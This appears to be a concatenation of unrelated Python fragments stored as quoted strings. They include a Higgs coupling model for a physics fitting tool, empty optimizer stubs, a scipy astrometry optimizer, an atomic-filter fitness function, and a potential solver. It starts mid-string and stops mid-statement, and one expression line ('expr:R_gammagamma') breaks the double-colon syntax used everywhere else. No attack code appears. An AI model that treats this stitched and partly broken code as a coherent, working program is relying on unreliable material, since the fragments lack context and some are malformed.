'\"4*(@0*@0/4. + 0.1320*@3*@3 + 0.1944*@1*@1 + 0.08075*@2*@2 + 0.7204*@0*@3/2. + 0.7437*@0*@1/2. + 0.2774*@3*@1) \",a1_WW,a2_WW,a3_WW,k1_WW'\n zgamma_expr = '\"4*(1.118600*@0*@0/4. +0.0035*@1*@1 - 0.125010*@0*@1/2. + 0.000003*@1*@1 - 0.00018*@1*@1 + 0.003100*@0*@1/2. +0.00126*@2*@2 + 0.000005*@2*@2 -0.00047*@2*@2)\",a1_WW,kappa,kappa_tilde'\n gg_expr = '\"(1.1068*@0*@0 + 0.0082*@0*@0 - 0.1150*@0*@0 + 2.5717*@1*@1 + 0.0091*@1*@1 - 0.1982*@1*@1)\",kappa,kappa_tilde'\n bb_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n cc_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n tautau_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n mumu_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n gmgm_expr = '\"4*(1.6054*@0*@0/4. + 0.07312*@1*@1 - 0.6854*@0*@1/2. + 0.00002*@1*@1 - 0.0018*@1*@1 + 0.0085*@0*@1/2. + 0.1699*@2*@2 + 0.00002*@2*@2 - 0.0031*@2*@2)\",a1_WW,kappa,kappa_tilde'\n \n self.modelBuilder.doVar('expr::R_WW('+str(ww_expr)+')')\n self.modelBuilder.doVar('expr::R_ZZ('+str(zz_expr)+')')\n self.modelBuilder.doVar('expr::R_Zgamma('+str(zgamma_expr)+')')\n self.modelBuilder.doVar('expr::R_gg('+str(gg_expr)+')')\n self.modelBuilder.doVar('expr::R_bb('+str(bb_expr)+')')\n self.modelBuilder.doVar('expr::R_cc('+str(cc_expr)+')')\n self.modelBuilder.doVar('expr::R_tautau('+str(tautau_expr)+')')\n self.modelBuilder.doVar('expr::R_mumu('+str(mumu_expr)+')')\n self.modelBuilder.doVar('expr:R_gammagamma('+str(gmgm_expr)+')')\n\n self.modelBuilder.doVar('expr::gammaH(\"(0.5824*@0 + 0.2137*@1 + 0.08187*@2 + 0.06272*@3 + 0.02891*@4 + 0.02619*@5 + 0.002270*@6 + 0.001533*@7 + 0.0002176*@8 )/0.9998\",R_bb,R_WW,R_gg,R_tautau,R_cc,R_ZZ,R_gammagamma,R_Zgamma,R_mumu)') \n\n ###########################\n\n self.g1V = GetCoupTerms(1,1,1,-0.0001,\"1V\") # Compensate for scaling of k1 templates \n self.g2V = GetCoupTerms(1,1,1,-0.0001,\"2V\") \n \n self.modelBuilder.doVar(\"expr::g2V_1(\\\"\"+str(self.g2V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1(\\\"((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1_Neg(\\\"-1*((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.doVar(\"expr::g2V_2(\\\"\"+str(self.g2V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2(\\\"((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2_Neg(\\\"-1*((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.doVar(\"expr::g2V_3(\\\"\"+str(self.g2V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3(\\\"((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3_Neg(\\\"-1*((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.doVar(\"expr::g2V_4(\\\"\"+str(self.g2V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4(\\\"((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4_Neg(\\\"-1*((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.doVar(\"expr::g2V_5(\\\"\"+str(self.g2V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5(\\\"((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5_Neg(\\\"-1*((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.doVar(\"expr::g2V_6(\\\"\"+str(self.g2V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6(\\\"((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6_Neg(\\\"-1*((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.doVar(\"expr::g2V_7(\\\"\"+str(self.g2V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7(\\\"((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7_Neg(\\\"-1*((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.doVar(\"expr::g2V_8(\\\"\"+str(self.g2V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8(\\\"((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8_Neg(\\\"-1*((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.doVar(\"expr::g2V_9(\\\"\"+str(self.g2V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9(\\\"((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9_Neg(\\\"-1*((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.doVar(\"expr::g2V_10(\\\"\"+str(self.g2V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10(\\\"((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10_Neg(\\\"-1*((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.doVar(\"expr::g2V_11(\\\"\"+str(self.g2V[10])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11(\\\"((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11_Neg(\\\"-1*((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.doVar(\"expr::g2V_12(\\\"\"+str(self.g2V[11])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12(\\\"((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12_Neg(\\\"-1*((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.doVar(\"expr::g2V_13(\\\"\"+str(self.g2V[12])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13(\\\"((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13_Neg(\\\"-1*((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.doVar(\"expr::g2V_14(\\\"\"+str(self.g2V[13])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14(\\\"((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14_Neg(\\\"-1*((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.doVar(\"expr::g2V_15(\\\"\"+str(self.g2V[14])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15(\\\"((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15_Neg(\\\"-1*((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.doVar(\"expr::g2V_16(\\\"\"+str(self.g2V[15])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16(\\\"((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16_Neg(\\\"-1*((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.doVar(\"expr::g2V_17(\\\"\"+str(self.g2V[16])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17(\\\"((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17_Neg(\\\"-1*((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.doVar(\"expr::g2V_18(\\\"\"+str(self.g2V[17])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18(\\\"((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18_Neg(\\\"-1*((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.doVar(\"expr::g2V_19(\\\"\"+str(self.g2V[18])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19(\\\"((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19_Neg(\\\"-1*((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.doVar(\"expr::g2V_20(\\\"\"+str(self.g2V[19])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20(\\\"((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20_Neg(\\\"-1*((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.doVar(\"expr::g2V_21(\\\"\"+str(self.g2V[20])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21(\\\"((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21_Neg(\\\"-1*((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.doVar(\"expr::g2V_22(\\\"\"+str(self.g2V[21])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22(\\\"((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22_Neg(\\\"-1*((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.doVar(\"expr::g2V_23(\\\"\"+str(self.g2V[22])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23(\\\"((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23_Neg(\\\"-1*((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.doVar(\"expr::g2V_24(\\\"\"+str(self.g2V[23])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24(\\\"((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24_Neg(\\\"-1*((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.doVar(\"expr::g2V_25(\\\"\"+str(self.g2V[24])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25(\\\"((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25_Neg(\\\"-1*((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.doVar(\"expr::g2V_26(\\\"\"+str(self.g2V[25])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26(\\\"((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26_Neg(\\\"-1*((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.doVar(\"expr::g2V_27(\\\"\"+str(self.g2V[26])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27(\\\"((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27_Neg(\\\"-1*((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.doVar(\"expr::g2V_28(\\\"\"+str(self.g2V[27])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28(\\\"((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28_Neg(\\\"-1*((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.doVar(\"expr::g2V_29(\\\"\"+str(self.g2V[28])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29(\\\"((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29_Neg(\\\"-1*((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.doVar(\"expr::g2V_30(\\\"\"+str(self.g2V[29])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30(\\\"((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30_Neg(\\\"-1*((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.doVar(\"expr::g2V_31(\\\"\"+str(self.g2V[30])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31(\\\"((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31_Neg(\\\"-1*((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.doVar(\"expr::g2V_32(\\\"\"+str(self.g2V[31])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32(\\\"((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32_Neg(\\\"-1*((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.doVar(\"expr::g2V_33(\\\"\"+str(self.g2V[32])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33(\\\"((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33_Neg(\\\"-1*((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.doVar(\"expr::g2V_34(\\\"\"+str(self.g2V[33])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34(\\\"((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34_Neg(\\\"-1*((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.doVar(\"expr::g2V_35(\\\"\"+str(self.g2V[34])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35(\\\"((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35_Neg(\\\"-1*((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n \n self.modelBuilder.doVar(\"expr::g1V_1(\\\"\"+str(self.g1V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1(\\\"((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1_Neg(\\\"-1*((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.doVar(\"expr::g1V_2(\\\"\"+str(self.g1V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2(\\\"((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2_Neg(\\\"-1*((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.doVar(\"expr::g1V_3(\\\"\"+str(self.g1V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3(\\\"((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3_Neg(\\\"-1*((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.doVar(\"expr::g1V_4(\\\"\"+str(self.g1V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4(\\\"((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4_Neg(\\\"-1*((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.doVar(\"expr::g1V_5(\\\"\"+str(self.g1V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5(\\\"((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5_Neg(\\\"-1*((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.doVar(\"expr::g1V_6(\\\"\"+str(self.g1V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6(\\\"((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6_Neg(\\\"-1*((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.doVar(\"expr::g1V_7(\\\"\"+str(self.g1V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7(\\\"((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7_Neg(\\\"-1*((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.doVar(\"expr::g1V_8(\\\"\"+str(self.g1V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8(\\\"((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8_Neg(\\\"-1*((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.doVar(\"expr::g1V_9(\\\"\"+str(self.g1V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9(\\\"((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9_Neg(\\\"-1*((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.doVar(\"expr::g1V_10(\\\"\"+str(self.g1V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10(\\\"((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10_Neg(\\\"-1*((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n \n self.modelBuilder.doSet(\"POI\",poi)", "def _optimise(self):\n pass", "def optimize_params(self, qnodes=None):\n #logger.debug(\"optimize_params of baseclass --> no optimization available!!!\")\n return {}", "def solvate(self):\n\n pass", "def optimizer(grad, method, init_par, alpha, delta, plx_obs, mualpha_obs, mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N):\r\n\r\n\t\r\n\tif grad == 'NO':\r\n\t\tif method == 'Powell' :\r\n\t\t\tres = opt.minimize(Ulike,init_par, method = method,\r\n\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N))\r\n\t\t\treturn res.x, res.nit\r\n\t\telif method == 'Nelder-Mead':\r\n\t\t\tres = opt.minimize(Ulike,init_par, method = method,\r\n\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N),\r\n\t\t\t\t options = {'ftol': 0.0001})\r\n\t\t\treturn res.x, res.nit\r\n\t\telif method == 'default':\r\n\t\t\tres = opt.minimize(Ulike,init_par, \r\n\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N))\r\n\t\t\treturn res.x, res.nit\r\n\r\n\telif grad == 'YES':\r\n\t\tres = opt.minimize(Ulike, init_par, method = method, jac = stella_grad_full, \r\n \t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N),\r\n\t\t\t options={'disp': True, 'maxiter': 4000, 'xtol': 1e-4})\r\n\t\treturn res.x, res.nit \r\n\t\t\t\r\n\t\t\r\n\telif grad == 'HESS':\r\n\t\tres = opt.minimize(Ulike, init_par, method = method, jac = stella_grad_full, hess = stella_hessian,\r\n\t\t\t\t\t args = (alpha, delta, plx_obs, mualpha_obs,mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoeff, N),\r\n\t\t\t\t\t options = {'disp': True, 'maxiter': 4000, 'xtol': 1.e-06}) \r\n\t\treturn res.x, res.nit", "def FitnessSkopt5D(inputParams):\n\n elecsusParams = baseParams.copy()\n\n paramDict = {'Bfield': inputParams[0], \"T\": inputParams[1], 'Btheta': np.deg2rad(inputParams[2]), 'Etheta': np.deg2rad(inputParams[3]), 'Bphi': np.deg2rad(inputParams[4])}\n\n # This is the full dictionary to use on ElecSus.\n elecsusParams.update(paramDict)\n\n # First generate the output transmission as before.\n inputE = np.array([np.cos(elecsusParams[\"Etheta\"]), np.sin(elecsusParams[\"Etheta\"]), 0])\n\n # Call ElecSus to obtain the output electric field.\n try:\n # There may at times be issues with ElecSus, such as when NaN is entered as a variable.\n [outputE] = elecsus.calculate(globalDetuning, inputE, elecsusParams, outputs = [\"E_out\"])\n except:\n print(\"There was an issue in ElecSus, so this iteration will return a figure of merit of 0. Here are the input parameters:\")\n print(\"Input parameters: \" + str(elecsusParams))\n print(\"Input field: \" + str(inputE))\n return 0.0\n \n # Use a Jones matrix to determine the electric field after the action of the second polariser. As this is a single filter, the two polarisers are crossed.\n polariserAngle = elecsusParams[\"Etheta\"] + np.pi/2\n\n # Define the Jones matrix. Though only explicitly defined for the x-y plane, we add the third dimension so that we can use all 3 dimensions of the output field.\n jonesMatrix = np.matrix([[np.cos(polariserAngle)**2, np.sin(polariserAngle)*np.cos(polariserAngle), 0],\n\t\t\t\t\t\t\t\t[np.sin(polariserAngle)*np.cos(polariserAngle), np.sin(polariserAngle)**2, 0],\n [0, 0, 1]])\n\n # Get the output from the filter and the polarisers.\n singleFilterOutputE = np.array(jonesMatrix * outputE)\n\n # Get the transmission.\n singleFilterTransmission = (singleFilterOutputE * singleFilterOutputE.conjugate()).sum(axis=0)\n\n ENBW = ((integrate(singleFilterTransmission, globalDetuning)/singleFilterTransmission.max().real)/1e3).real\n\n figureOfMerit = (singleFilterTransmission.max()/ENBW).real\n \n if np.isnan(figureOfMerit):\n # Usually occurs in the case of high temperatures and B fields, since the transmission is just a flat line.\n print(\"Figure of merit is NaN! Here are the input parameters:\")\n print(str(elecsusParams))\n return 0.0\n else:\n return -1.0 * figureOfMerit", "def potentialSolver2(self, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n 